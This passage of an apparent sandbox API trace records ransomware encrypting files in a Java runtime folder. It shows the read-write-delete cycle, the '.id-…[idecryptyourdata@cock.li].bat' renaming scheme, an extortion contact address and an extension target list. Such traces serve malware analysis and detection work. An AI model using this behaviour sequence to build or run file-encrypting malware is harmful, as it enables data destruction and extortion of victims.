Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.671] lstrlenW (lpString=".dbf") returned 4 [0201.671] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0201.671] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.671] lstrlenW (lpString=".1cd") returned 4 [0201.671] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0201.671] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll") returned 65 [0201.671] lstrlenW (lpString=".jpg") returned 4 [0201.671] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0201.671] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0201.671] lstrlenW (lpString="accessibility.properties") returned 24 [0201.671] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.672] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=149) returned 1 [0201.672] CloseHandle (hObject=0x344) returned 1 [0201.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties")) returned 0x20 [0201.672] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.672] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.672] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.672] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.672] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0201.673] GetLastError () returned 0x0 [0201.673] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x95, lpOverlapped=0x0) returned 1 [0201.674] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xa0, lpOverlapped=0x0) returned 1 [0201.675] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.675] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x104, lpOverlapped=0x0) returned 1 [0201.675] SetEndOfFile (hFile=0x330) returned 1 [0201.675] CloseHandle (hObject=0x330) returned 1 [0201.675] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.675] SetEndOfFile (hFile=0x344) returned 1 [0201.676] CloseHandle (hObject=0x344) returned 1 [0201.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.677] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\accessibility.properties")) returned 1 [0201.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.677] lstrlenW (lpString=".doc") returned 4 [0201.677] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0201.677] lstrlenW (lpString=".docx") returned 5 [0201.677] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0201.677] lstrlenW (lpString=".pdf") returned 4 [0201.677] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0201.677] lstrlenW (lpString=".xls") returned 4 [0201.677] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0201.677] lstrlenW (lpString=".xlsx") returned 5 [0201.677] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0201.677] lstrlenW (lpString=".ppt") returned 4 [0201.677] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0201.677] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.677] lstrlenW (lpString=".zip") returned 4 [0201.677] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0201.677] lstrlenW (lpString=".rar") returned 4 [0201.677] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0201.677] lstrlenW (lpString=".bz2") returned 4 [0201.677] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString=".7z") returned 3 [0201.678] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0201.678] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.678] lstrlenW (lpString=".dbf") returned 4 [0201.678] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.678] lstrlenW (lpString=".1cd") returned 4 [0201.678] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.678] lstrlenW (lpString=".jpg") returned 4 [0201.678] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.678] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.678] lstrlenW (lpString=".doc") returned 4 [0201.678] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString=".docx") returned 5 [0201.678] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0201.678] lstrlenW (lpString=".pdf") returned 4 [0201.678] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString=".xls") returned 4 [0201.678] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString=".xlsx") returned 5 [0201.678] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0201.678] lstrlenW (lpString=".ppt") returned 4 [0201.678] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.678] lstrlenW (lpString=".zip") returned 4 [0201.678] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0201.678] lstrlenW (lpString=".rar") returned 4 [0201.679] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0201.679] lstrlenW (lpString=".bz2") returned 4 [0201.679] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0201.679] lstrlenW (lpString=".7z") returned 3 [0201.679] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0201.679] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.679] lstrlenW (lpString=".dbf") returned 4 [0201.679] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0201.679] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.679] lstrlenW (lpString=".1cd") returned 4 [0201.679] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0201.679] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\accessibility.properties") returned 63 [0201.679] lstrlenW (lpString=".jpg") returned 4 [0201.679] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0201.679] lstrcmpiW (lpString1=".cfg", lpString2=".bat") returned 1 [0201.679] lstrlenW (lpString="jvm.cfg") returned 7 [0201.679] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.680] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=634) returned 1 [0201.680] CloseHandle (hObject=0x344) returned 1 [0201.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg")) returned 0x20 [0201.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.680] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.680] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.680] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.680] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0201.681] GetLastError () returned 0x0 [0201.681] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x27a, lpOverlapped=0x0) returned 1 [0201.682] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x280, lpOverlapped=0x0) returned 1 [0201.684] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.684] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe2, lpOverlapped=0x0) returned 1 [0201.684] SetEndOfFile (hFile=0x330) returned 1 [0201.684] CloseHandle (hObject=0x330) returned 1 [0201.684] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.684] SetEndOfFile (hFile=0x344) returned 1 [0201.685] CloseHandle (hObject=0x344) returned 1 [0201.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.685] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg")) returned 1 [0201.685] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.685] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.686] lstrlenW (lpString=".doc") returned 4 [0201.686] lstrcmpiW (lpString1=".doc", lpString2=".cfg") returned 1 [0201.686] lstrlenW (lpString=".docx") returned 5 [0201.686] lstrcmpiW (lpString1=".docx", lpString2="m.cfg") returned -1 [0201.686] lstrlenW (lpString=".pdf") returned 4 [0201.686] lstrcmpiW (lpString1=".pdf", lpString2=".cfg") returned 1 [0201.686] lstrlenW (lpString=".xls") returned 4 [0201.686] lstrcmpiW (lpString1=".xls", lpString2=".cfg") returned 1 [0201.686] lstrlenW (lpString=".xlsx") returned 5 [0201.686] lstrcmpiW (lpString1=".xlsx", lpString2="m.cfg") returned -1 [0201.686] lstrlenW (lpString=".ppt") returned 4 [0201.686] lstrcmpiW (lpString1=".ppt", lpString2=".cfg") returned 1 [0201.686] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.686] lstrlenW (lpString=".zip") returned 4 [0201.686] lstrcmpiW (lpString1=".zip", lpString2=".cfg") returned 1 [0201.686] lstrlenW (lpString=".rar") returned 4 [0201.686] lstrcmpiW (lpString1=".rar", lpString2=".cfg") returned 1 [0201.686] lstrlenW (lpString=".bz2") returned 4 [0201.686] lstrcmpiW (lpString1=".bz2", lpString2=".cfg") returned -1 [0201.686] lstrlenW (lpString=".7z") returned 3 [0201.686] lstrcmpiW (lpString1=".7z", lpString2="cfg") returned -1 [0201.686] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.686] lstrlenW (lpString=".dbf") returned 4 [0201.686] lstrcmpiW (lpString1=".dbf", lpString2=".cfg") returned 1 [0201.686] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.686] lstrlenW (lpString=".1cd") returned 4 [0201.686] lstrcmpiW (lpString1=".1cd", lpString2=".cfg") returned -1 [0201.686] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.686] lstrlenW (lpString=".jpg") returned 4 [0201.686] lstrcmpiW (lpString1=".jpg", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.687] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.687] lstrlenW (lpString=".doc") returned 4 [0201.687] lstrcmpiW (lpString1=".doc", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString=".docx") returned 5 [0201.687] lstrcmpiW (lpString1=".docx", lpString2="m.cfg") returned -1 [0201.687] lstrlenW (lpString=".pdf") returned 4 [0201.687] lstrcmpiW (lpString1=".pdf", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString=".xls") returned 4 [0201.687] lstrcmpiW (lpString1=".xls", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString=".xlsx") returned 5 [0201.687] lstrcmpiW (lpString1=".xlsx", lpString2="m.cfg") returned -1 [0201.687] lstrlenW (lpString=".ppt") returned 4 [0201.687] lstrcmpiW (lpString1=".ppt", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.687] lstrlenW (lpString=".zip") returned 4 [0201.687] lstrcmpiW (lpString1=".zip", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString=".rar") returned 4 [0201.687] lstrcmpiW (lpString1=".rar", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString=".bz2") returned 4 [0201.687] lstrcmpiW (lpString1=".bz2", lpString2=".cfg") returned -1 [0201.687] lstrlenW (lpString=".7z") returned 3 [0201.687] lstrcmpiW (lpString1=".7z", lpString2="cfg") returned -1 [0201.687] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.687] lstrlenW (lpString=".dbf") returned 4 [0201.687] lstrcmpiW (lpString1=".dbf", lpString2=".cfg") returned 1 [0201.687] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.687] lstrlenW (lpString=".1cd") returned 4 [0201.687] lstrcmpiW (lpString1=".1cd", lpString2=".cfg") returned -1 [0201.688] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\amd64\\jvm.cfg") returned 52 [0201.688] lstrlenW (lpString=".jpg") returned 4 [0201.688] lstrcmpiW (lpString1=".jpg", lpString2=".cfg") returned 1 [0201.688] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0201.688] lstrlenW (lpString="calendars.properties") returned 20 [0201.688] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.690] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=1378) returned 1 [0201.690] CloseHandle (hObject=0x344) returned 1 [0201.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties")) returned 0x20 [0201.690] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.690] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0201.690] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.691] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.691] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0201.691] GetLastError () returned 0x0 [0201.691] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x562, lpOverlapped=0x0) returned 1 [0201.760] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x570, lpOverlapped=0x0) returned 1 [0201.761] ReadFile (in: hFile=0x344, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.761] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xfc, lpOverlapped=0x0) returned 1 [0201.761] SetEndOfFile (hFile=0x330) returned 1 [0201.762] CloseHandle (hObject=0x330) returned 1 [0201.762] SetFilePointerEx (in: hFile=0x344, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.762] SetEndOfFile (hFile=0x344) returned 1 [0201.763] CloseHandle (hObject=0x344) returned 1 [0201.763] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.763] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties")) returned 1 [0201.763] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.763] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.763] lstrlenW (lpString=".doc") returned 4 [0201.763] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0201.763] lstrlenW (lpString=".docx") returned 5 [0201.763] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0201.763] lstrlenW (lpString=".pdf") returned 4 [0201.763] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0201.763] lstrlenW (lpString=".xls") returned 4 [0201.763] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0201.763] lstrlenW (lpString=".xlsx") returned 5 [0201.764] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0201.764] lstrlenW (lpString=".ppt") returned 4 [0201.764] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.764] lstrlenW (lpString=".zip") returned 4 [0201.764] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString=".rar") returned 4 [0201.764] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString=".bz2") returned 4 [0201.764] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString=".7z") returned 3 [0201.764] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0201.764] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.764] lstrlenW (lpString=".dbf") returned 4 [0201.764] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.764] lstrlenW (lpString=".1cd") returned 4 [0201.764] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.764] lstrlenW (lpString=".jpg") returned 4 [0201.764] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.764] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.764] lstrlenW (lpString=".doc") returned 4 [0201.764] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0201.764] lstrlenW (lpString=".docx") returned 5 [0201.764] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0201.764] lstrlenW (lpString=".pdf") returned 4 [0201.765] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString=".xls") returned 4 [0201.765] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString=".xlsx") returned 5 [0201.765] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0201.765] lstrlenW (lpString=".ppt") returned 4 [0201.765] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.765] lstrlenW (lpString=".zip") returned 4 [0201.765] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString=".rar") returned 4 [0201.765] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString=".bz2") returned 4 [0201.765] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString=".7z") returned 3 [0201.765] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0201.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.765] lstrlenW (lpString=".dbf") returned 4 [0201.765] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.765] lstrlenW (lpString=".1cd") returned 4 [0201.765] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0201.765] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties") returned 59 [0201.765] lstrlenW (lpString=".jpg") returned 4 [0201.765] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0201.765] lstrcmpiW (lpString1=".pf", lpString2=".bat") returned 1 [0201.766] lstrlenW (lpString="GRAY.pf") returned 7 [0201.766] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.937] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=632) returned 1 [0201.937] CloseHandle (hObject=0x390) returned 1 [0201.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf")) returned 0x20 [0201.938] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 